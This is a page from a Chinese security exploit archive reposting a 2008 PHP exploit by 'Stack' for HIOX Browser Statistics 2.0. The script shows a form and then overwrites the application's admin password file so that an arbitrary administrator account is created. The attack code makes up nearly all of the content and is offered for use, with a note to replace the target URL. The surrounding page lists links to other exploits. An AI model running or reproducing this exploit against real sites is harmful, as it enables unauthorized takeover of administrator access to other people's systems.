首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit
来源:www.vfcocus.net 作者:Stack 发布时间:2008-07-31  
<?php
@session_start();
?>
<table align=center width=72% height=95% ><tr><td>
<?php
/*
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability 
[~] Discoverd & exploited by Stack
[~]Greeatz All Freaind
[~]Special thnx to Str0ke
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
You need to change http://localhost/path/ with the link of script it's very importent
*/
$creat = "true";
$iswrite = $_POST['createe'];
if($user=="" && $pass==""){
if($iswrite == "creatuser")
{
    $usname = $_POST['usernam'];
    $passwrd = md5($_POST['pword']);
    if($usname != "" && $passwrd != ""){
$filee = "http://localhost/path/admin/passwo.php";
$file1 = file($filee);
        $file = fopen($filee,'w');
        fwrite($file, "<?php \n");
        fwrite($file, "$");
        fwrite($file, "user=\"$usname\";\n");
        fwrite($file, "$");
        fwrite($file, "pass=\"$passwrd\";");
        fwrite($file, "\n?>");
        fclose($file);
    $creat = "false";
    echo "<div align=center style='color: green;'><b>New User Created
  <meta http-equiv=\"refresh\" content=\"2; url=http://localhost/path/admin/index.php\">
  <br>Please Wait You will be Redirected to Login Page
   </div>";
    }
    else{
        echo "<div align=center style='color: red;'><b>Enter correct Username or Password </div>";
    }
}
if($creat == "true"){
?>
<table align=center valign=center bgcolor=000000 align=center cellpadding=0 style="border: 1px #000000 solid;">
<tr width=400 height=20><td align=center bgcolor="000000"
style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
Create New User </td></tr>
     <tr width=400 height=20><td>
        <form name=setf method=POST action=<?php echo $PHP_SELF;?>>
        <table style="color:#ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
        <tr><td>User Name</td><td><input class="ta" name="usernam"  type=text maxlength=20 >
                </td></tr>
        <tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>
        <input name="createe" type=hidden value="creatuser"></td></tr>
        <tr><td></td><td><input type=submit value="create"></td></tr>
        </table>
</form>
</td></tr></table>
<?php
}
}else{
echo "<div align=center style='color: red;'><b>User Already Exist</div>";
}
?>
</td></tr></table>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HIOX Random Ad 1.3 Arbitrary A
·eNdonesia 8.4 (Calendar Module
·e107 Plugin BLOG Engine 2.2 Bl
·Pligg <= 9.9.0 Remote Code Exe
·CoolPlayer m3u File Local Buff
·NCTsoft AudFile.dll ActiveX Co
·Cisco IOS 12.3(18) FTP Server
·Symphony <= 1.7.01 (non-patche
·Trend Micro OfficeScan ObjRemo
·Coppermine Photo Gallery <= 1.
·IceBB <= 1.0-RC9.2 Blind SQL I
·moziloCMS 1.10.1 (download.php
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved